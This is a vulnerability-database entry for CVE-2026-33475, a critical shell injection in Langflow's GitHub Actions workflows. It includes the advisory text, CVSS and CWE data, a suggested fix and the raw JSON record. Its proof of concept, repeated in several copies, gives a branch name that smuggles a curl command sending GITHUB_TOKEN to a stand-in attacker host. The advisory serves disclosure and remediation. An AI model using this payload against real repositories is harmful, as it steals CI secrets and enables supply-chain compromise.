CVE-2026-33475 (GCVE-0-2026-33475)

Vulnerability from cvelistv5 – Published: 2026-03-24 12:54 – Updated: 2026-03-25 03:55
VLAI?
Title
Langflow GitHub Actions Shell Injection
Summary
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` Or: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. **Fork** the Langflow repository 2. **Create a new branch** with the name: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. **Open a Pull Request** to the main branch from the new branch 4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`) 5. The `run:` step containing: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Will execute: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - **Type:** Shell Injection / Remote Code Execution in CI - **Scope:** Any public Langflow fork with GitHub Actions enabled - **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to **use environment variables** and wrap them in **double quotes**: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value. --- ### Affected Files (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`
Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CWE
  • CWE-74 - Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
  • CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
Impacted products
Vendor Product Version
langflow-ai langflow Affected: < 1.9.0
Create a notification for this product.
Show details on NVD website
To clipboard 

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33475",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-25T03:55:45.997Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "langflow",
          "vendor": "langflow-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.9.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\n\n---\n\n### Details\n\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\n\n```yaml\nrun: |\n  validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nOr:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\n\n---\n\n### PoC\n\n1. **Fork** the Langflow repository\n2. **Create a new branch** with the name:\n   ```bash\n   injection-test \u0026\u0026 curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n3. **Open a Pull Request** to the main branch from the new branch\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\n5. The `run:` step containing:\n   ```yaml\n   echo \"Branch: ${{ github.head_ref }}\"\n   ```\n   Will execute:\n   ```bash\n   echo \"Branch: injection-test\"\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n\n6. The attacker receives the CI secret via the exfil URL.\n\n---\n\n### Impact\n\n- **Type:** Shell Injection / Remote Code Execution in CI\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\n\n---\n\n### Suggested Fix\n\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\n\n```yaml\nenv:\n  BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n  echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\n\n---\n\n### Affected Files (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-74",
              "description": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-24T12:54:33.369Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w"
        }
      ],
      "source": {
        "advisory": "GHSA-87cc-65ph-2j4w",
        "discovery": "UNKNOWN"
      },
      "title": "Langflow GitHub Actions Shell Injection"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33475",
    "datePublished": "2026-03-24T12:54:33.369Z",
    "dateReserved": "2026-03-20T16:16:48.969Z",
    "dateUpdated": "2026-03-25T03:55:45.997Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33475\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-24T13:16:04.030\",\"lastModified\":\"2026-03-24T19:13:01.250\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\\n\\n---\\n\\n### Details\\n\\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\\n\\n```yaml\\nrun: |\\n  validate_branch_name \\\"${{ github.event.pull_request.head.ref }}\\\"\\n```\\n\\nOr:\\n\\n```yaml\\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\\n```\\n\\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\\n\\n---\\n\\n### PoC\\n\\n1. **Fork** the Langflow repository\\n2. **Create a new branch** with the name:\\n   ```bash\\n   injection-test \u0026\u0026 curl https://attacker.site/exfil?token=$GITHUB_TOKEN\\n   ```\\n3. **Open a Pull Request** to the main branch from the new branch\\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\\n5. The `run:` step containing:\\n   ```yaml\\n   echo \\\"Branch: ${{ github.head_ref }}\\\"\\n   ```\\n   Will execute:\\n   ```bash\\n   echo \\\"Branch: injection-test\\\"\\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\\n   ```\\n\\n6. The attacker receives the CI secret via the exfil URL.\\n\\n---\\n\\n### Impact\\n\\n- **Type:** Shell Injection / Remote Code Execution in CI\\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\\n\\n---\\n\\n### Suggested Fix\\n\\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\\n\\n```yaml\\nenv:\\n  BRANCH_NAME: ${{ github.head_ref }}\\nrun: |\\n  echo \\\"Branch is: \\\\\\\"$BRANCH_NAME\\\\\\\"\\\"\\n```\\n\\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\\n\\n---\\n\\n### Affected Files (Langflow `1.3.4`)\\n\\n- `.github/actions/install-playwright/action.yml`\\n- `.github/workflows/deploy-docs-draft.yml`\\n- `.github/workflows/docker-build.yml`\\n- `.github/workflows/release_nightly.yml`\\n- `.github/workflows/python_test.yml`\\n- `.github/workflows/typescript_test.yml`\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-74\"},{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.9.0\",\"matchCriteriaId\":\"D51A889E-5C89-4A92-B32B-C91EAF735430\"}]}]}],\"references\":[{\"url\":\"https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33475\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T14:04:02.599408Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T14:04:12.775Z\"}}], \"cna\": {\"title\": \"Langflow GitHub Actions Shell Injection\", \"source\": {\"advisory\": \"GHSA-87cc-65ph-2j4w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"langflow-ai\", \"product\": \"langflow\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.9.0\"}]}], \"references\": [{\"url\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w\", \"name\": \"https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\\n\\n---\\n\\n### Details\\n\\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\\n\\n```yaml\\nrun: |\\n  validate_branch_name \\\"${{ github.event.pull_request.head.ref }}\\\"\\n```\\n\\nOr:\\n\\n```yaml\\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\\n```\\n\\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\\n\\n---\\n\\n### PoC\\n\\n1. **Fork** the Langflow repository\\n2. **Create a new branch** with the name:\\n   ```bash\\n   injection-test \u0026\u0026 curl https://attacker.site/exfil?token=$GITHUB_TOKEN\\n   ```\\n3. **Open a Pull Request** to the main branch from the new branch\\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\\n5. The `run:` step containing:\\n   ```yaml\\n   echo \\\"Branch: ${{ github.head_ref }}\\\"\\n   ```\\n   Will execute:\\n   ```bash\\n   echo \\\"Branch: injection-test\\\"\\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\\n   ```\\n\\n6. The attacker receives the CI secret via the exfil URL.\\n\\n---\\n\\n### Impact\\n\\n- **Type:** Shell Injection / Remote Code Execution in CI\\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\\n\\n---\\n\\n### Suggested Fix\\n\\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\\n\\n```yaml\\nenv:\\n  BRANCH_NAME: ${{ github.head_ref }}\\nrun: |\\n  echo \\\"Branch is: \\\\\\\"$BRANCH_NAME\\\\\\\"\\\"\\n```\\n\\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\\n\\n---\\n\\n### Affected Files (Langflow `1.3.4`)\\n\\n- `.github/actions/install-playwright/action.yml`\\n- `.github/workflows/deploy-docs-draft.yml`\\n- `.github/workflows/docker-build.yml`\\n- `.github/workflows/release_nightly.yml`\\n- `.github/workflows/python_test.yml`\\n- `.github/workflows/typescript_test.yml`\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-74\", \"description\": \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-24T12:54:33.369Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33475\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T14:04:22.412Z\", \"dateReserved\": \"2026-03-20T16:16:48.969Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-24T12:54:33.369Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.